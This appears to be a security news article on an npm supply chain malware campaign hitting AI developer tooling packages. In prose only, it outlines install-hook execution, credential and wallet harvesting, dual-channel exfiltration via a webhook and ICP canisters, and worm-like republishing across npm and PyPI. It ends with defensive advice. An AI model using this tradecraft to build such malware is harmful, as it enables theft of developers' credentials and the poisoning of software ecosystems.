Canister-Backed npm Malware Campaign Expands, Targeting AI Developer Toolchains

A new wave of supply chain attacks is hitting the npm ecosystem, and this time the blast radius is moving deeper into AI developer workflows. Security researchers at Socket say the latest campaign shows strong overlap with a previously identified wormable attack dubbed CanisterWorm, suggesting either a shared operator or direct reuse of adversary tooling.

At the center of the incident are compromised packages tied to Namastex Labs, a company that promotes AI consulting and autonomous agent tooling through its Automagik suite. Malicious versions of packages such as @automagik/genie and pgserve were quietly republished with embedded malware that executes during installation, turning routine developer workflows into an entry point for credential theft and lateral supply chain compromise.

A Familiar Playbook, Now Aimed at AI Tooling

According to Socket’s analysis, the malware closely mirrors tactics seen in earlier TeamPCP-linked supply chain attacks. The payload executes automatically during installation, harvests secrets from the developer environment, and exfiltrates them to attacker-controlled infrastructure. It then attempts to propagate itself by abusing stolen publishing credentials.

What stands out is the infrastructure choice. Instead of relying solely on traditional command and control servers, the attackers again use Internet Computer Protocol (ICP) canisters as a dead-drop channel. This approach makes takedowns more difficult and signals a growing shift toward decentralized infrastructure in malware operations.

The overlap is not subtle. Researchers identified explicit references in the malicious code to previously observed TeamPCP techniques, including methods associated with LiteLLM-related attack chains.

Credential Theft at Developer Scale

The payload goes far beyond basic data collection. It systematically scans for high-value secrets across local environments, including configuration files, cloud credentials, SSH keys, and CI/CD tokens. It also digs into developer tooling artifacts such as Kubernetes configs, Terraform state, and local environment files.

This behavior is designed to maximize downstream impact. A single compromised developer machine can expose access to production systems, cloud environments, and internal package registries.

The malware also targets browser and crypto wallet data, attempting to extract credentials and local storage tied to wallets like MetaMask and Phantom, along with files associated with Bitcoin, Ethereum, and Solana ecosystems.

Exfiltration Meets Encryption

Once collected, the data is exfiltrated through two parallel channels. One uses a standard HTTPS webhook endpoint. The other sends data to an ICP canister endpoint, effectively decentralizing part of the attacker’s infrastructure.

If a bundled RSA key is present, the malware encrypts stolen data using AES and RSA-based encryption. If not, it falls back to plaintext transmission. This dual-mode approach ensures data exfiltration succeeds even if parts of the payload fail.

Worm-Like Propagation Across npm and PyPI

This is not just a credential stealer. It is a self-propagating system.

The malware attempts to extract npm tokens from infected machines, identify packages the victim can publish, inject malicious install hooks, and republish those packages. In parallel, it includes logic to spread into the Python ecosystem by generating .pth-based payloads that execute automatically when Python starts.

That cross-ecosystem capability raises the stakes. It turns a single compromised environment into a launchpad for multi-language supply chain attacks spanning npm and PyPI.

Signs of a Larger Compromise

Several indicators suggest this may not be a simple case of a rogue package upload.

The affected packages appear to belong to legitimate projects with real users and active development. Some versions published to npm do not align with corresponding GitHub tags, a mismatch often associated with compromised publishing pipelines.

Researchers also identified related malicious packages across multiple namespaces, including @fairwords and @openwebconcept, pointing to shared infrastructure or code reuse.

At the time of analysis, some compromised packages still showed active download volume, underscoring the risk to downstream developers.

Tradecraft Evolution in Software Supply Chain Attacks

The attack combines several advanced techniques into a single payload:

• Install-time execution via postinstall hooks

• Broad credential harvesting across developer environments

• Dual-channel exfiltration using webhooks and decentralized infrastructure

• Worm-like propagation through stolen publishing credentials

• Cross-ecosystem targeting of npm and PyPI

This convergence signals a maturation of supply chain threats. Attackers are no longer just poisoning packages. They are building self-sustaining infection loops designed to scale across developer ecosystems.

What Security Teams Should Do Now

Defenders should assume compromise if any affected versions were installed.

Immediate actions include removing malicious package versions, rotating all exposed credentials, and auditing package publishing activity for anomalies. Teams should also hunt for indicators such as unusual postinstall scripts, known exfiltration endpoints, and mismatches between npm packages and source repositories.

Comparing published artifacts against GitHub releases is becoming a critical control point. Any discrepancy may signal tampering in the release pipeline.

The Bigger Picture

This campaign highlights a growing trend. As AI tooling and developer automation platforms gain adoption, they are becoming high-value targets for supply chain attackers.

By embedding malware into tools used for building and deploying AI systems, threat actors are positioning themselves upstream of entire software ecosystems.

The use of decentralized infrastructure like ICP further complicates detection and takedown efforts. Combined with worm-like propagation, it creates a blueprint for attacks that can persist and spread with minimal centralized control.

For security teams, the message is clear. The software supply chain is no longer just a risk surface. It is an active battlefield where attackers are iterating quickly and targeting the very tools developers trust the most.